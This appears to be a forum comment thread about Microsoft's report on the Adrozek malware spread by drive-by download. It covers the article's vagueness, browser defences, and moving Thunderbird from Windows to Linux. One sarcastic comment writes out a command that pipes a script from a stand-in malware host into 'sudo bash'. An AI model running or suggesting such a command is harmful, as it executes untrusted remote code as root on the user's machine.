The article leaves it open whether the user needs to double-click the malicious file or whether it is executed without user interaction through some exploit.
"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.
Not really the article's fault. As they state near the end, Microsoft themselves didn't provide this info.
> Thursday’s [Microsoft] post doesn’t explicitly say what, if any, user interaction is required for infections to occur. It’s also not clear what effect defenses like User Account Control have. Microsoft makes no mention of the attack hitting browsers running macOS or Linux, so it's likely this campaign affects only Windows users. Microsoft representatives didn’t respond to an email asking for details.
It is still the articles fault for existing at all. The behaviour of the payload is not very interesting or helpful and you have to read almost the entire article to discover that you have wasted your time.
That's fairly typical of a Dan Goodin article. The best you can really hope to do is pick out some search terms that'll find something actually useful, like the source material in this case: https://www.microsoft.com/security/blog/2020/12/10/widesprea...
It's like those "oh my god new Android malware is eating the world" articles that just casually say "after the user installs the apk and gives it device admin permissions" as if it's not a barrier at all. Coincidently, these articles are usually written by anti-virus companies.
It's the line about dropping installer exe files into a directory which is where I stopped reading. This sounds like it needs user execution so isn't really anything new.
Penny Arcade is considering running ads again partly because, as they put it, "I seem to have found somebody that won't serve weird scripts to readers, which has the scent of progress."
They go on: "Because I hail from another era of Internet publishing, there are certain classes of ads that I'm uncomfortable with - of course, these are the most lucrative ones.". Hence the bind less profitable websites find themselves in.
Why are we not seeing more information from MS on this? Should they not explain exactly how it behaves, like if it requires user interaction to run or whatnot? I get that their policy is never to say anything meaningful unless its a marketing pitch, but this seems like the exact right time to be open and explain exactly what it does.
I will be down voted with this reddit-like comment but in other news running "curl http://getmesomemalware.com/ - | sudo bash" and then entering your password proves just how insecure Linux actually is.
It was a comment on "do stupid things, win stupid prizes." i.e. if you download random bits of code from suspicious websites and give it super user access, you're going to have a bad time.
Wonder if my use of ubo n noscript would protect from this? i'm trying to use a fedora kda linux box as my daily driver, but my windows 8 lappy still sits there to run thunderbird rules and onenote, so I'm half protected from an OS perspective I guess?
> you can run thunderbird on linux, copy your rules over.
Now there's a good idea. Going to research how to install Thunderbirdon Linux now. I've been a windows baby duck since I first used a computer in 2000 w/ Windows 2000 and so not having familiar creature comforts like thunderbird_setup.exe or even a "Program Files" folder is taking some getting used to.
Installing popular open source apps on Linux is generally super easy.
On Ubuntu (and most other desktop-centric Linux distros) the installation process is going to look something like opening the "Software Center" application, searching for "Thunderbird" and clicking "Install."
Install Thunderbird from a package manager. On Fedora I suppose that's DNF or RPM now, but it used to be yum or RPM.
Some analogous folders between Windows and Linux (the File Hierarchy Standard):
System-wide binaries (.exe) for userland software on Windows:
C:\Program Files (x86)\
C:\Program Files\
System-wide binaries for userland software on Linux:
/usr/bin/
/usr/local/bin/
System-wide configuration files on Windows:
C:\Program Data\
System-wide configuration files on Linux:
/etc/
Per-user binaries (.exe) on Windows:
C:\Users\JillS\AppData\Local\
C:\Users\JillS\AppData\Local\Programs\
Per-user binaries on Linux:
/home/jills/.local/bin/
(also various user-specified locations under /home/jills/)
Per-user configuration files on Windows:
C:\Users\JillS\
C:\Users\JillS\AppData\Roaming\
Per-user configuration files on Linux:
/home/jills/.config/
(A different location can be specified on most Linux desktop setups (i.e., those that use the X Window System) by changing environment variable $XDG_CONFIG_HOME to equal the desired location)
Admin (root) binaries on Windows:
C:\Windows\
Root (admin) binaries on Linux:
/bin/
/sbin/
The environment variable PATH works the same in principle on both Windows and Linux. On Windows you change PATH in the GUI "Edit environment variables for your account". On Linux you typically use a text editor to open one of the standard "dot" files in /home/jills/, such as .profile or .bashrc, and specify PATH in there.
EDIT:
It would help if you knew where Fedora's Thunderbird packagers put your Thunderbird email files. I think it's typically
/home/multicomp/.thunderbird/
If that's true in your case, then just find your `x1y2z3.default` folders on Windows and copy them to that Linux directory. Not sure if the `.ini` files matter, but copying those shouldn't hurt.
Two of my desktop and one of my laptop PCS were hit recently and I was not aware who the most likely corporate or until I read this post. Strange thing, is that yesterday I started noticing the same pop-ups in my browser on my Android phone. I'm reinstalling Windows later today on all my three PCs and will be using virustotal religiously.
If you're not running javascript, probably. Better yet fire up a VM if you're heading into the nether-regions of the internet. Or there's also Sandboxie, anyone still use it and recommend?
As for me, I think that VM suggestion is a good idea. In theory I stay on the tech utopia cyberneighborhoods like Matrix forums, Fxtec forums, etc. but I figure banner ads can be found in the most unlikely places.
“On Edge, for instance, the malware modifies MsEdge.dll so that it turns off security controls that help detect unauthorized changes to the Secure Preferences file.”
How can malware tamper with a system DLL without code signing setting off alarms?
Microsoft Windows compromised through browser drive-by attack.
“The post said that Adrozek is installed “through drive-by download.” Installer file names use the format of setup__.exe. Attackers drop a file in the Windows temporary folder”
"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.